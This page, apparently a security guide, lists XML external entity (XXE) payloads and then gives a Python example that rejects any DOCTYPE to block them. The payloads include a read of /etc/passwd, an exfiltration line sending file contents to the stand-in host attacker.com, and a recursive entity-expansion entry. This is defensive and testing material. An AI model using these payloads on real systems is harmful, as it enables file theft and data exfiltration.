Some XXE Payloads

Here are some common XXE payloads that can be used to test for XXE:

<!DOCTYPE replace [<!ENTITY example "Hello World">]>
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>
<!DOCTYPE replace [<!ENTITY example SYSTEM "ftp://username:password@ftp.example.com/file">]>
<!DOCTYPE replace [<!ENTITY example SYSTEM "http://example.com/file">]>
<!DOCTYPE replace [<!ENTITY example SYSTEM "http://attacker.com/?data=%file_contents;">]>
<!DOCTYPE replace [<!ENTITY example "Hello &example2;"><!ENTITY example2 "&example;&example;&example;">]>

These payloads are …
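Every payload in the list above depends on a DOCTYPE declaration, so a parser that refuses any DOCTYPE rejects all of them before an entity is expanded or resolved. The following is an added example, not code from the original page; the names parse_untrusted, DTDForbidden and classify are hypothetical, and the sample documents are constructed from the list above.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """The document carries a DOCTYPE, so it may declare entities."""


def parse_untrusted(xml_text):
    """Parse untrusted XML and return its element names in document order.

    Raises DTDForbidden as soon as a DOCTYPE is seen, before any entity
    declared inside it can be expanded or resolved.
    """
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden("DOCTYPE %r rejected" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_text, True)
    return names


def classify(xml_text):
    """Return 'accepted', 'rejected' (DTD present) or 'malformed'."""
    try:
        parse_untrusted(xml_text)
    except DTDForbidden:
        return "rejected"
    except xml.parsers.expat.ExpatError:
        return "malformed"
    return "accepted"


# Constructed sample documents: three DOCTYPEs from the list above (typed with
# straight quotes), each followed by a constructed <replace> root element.
BODY = "<replace>&example;</replace>"
SAMPLES = [
    '<!DOCTYPE replace [<!ENTITY example "Hello World">]>' + BODY,
    '<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>' + BODY,
    '<!DOCTYPE replace [<!ENTITY example "Hello &example2;">'
    '<!ENTITY example2 "&example;&example;&example;">]>' + BODY,
]

if __name__ == "__main__":
    for doc in SAMPLES:
        print(classify(doc), doc[:60])
    print(classify("<order><item>1</item></order>"))  # no DTD
```

Rejecting the DOCTYPE outright also covers the harmless "Hello World" entity, which is the intended trade-off when the application has no need for DTDs in incoming documents.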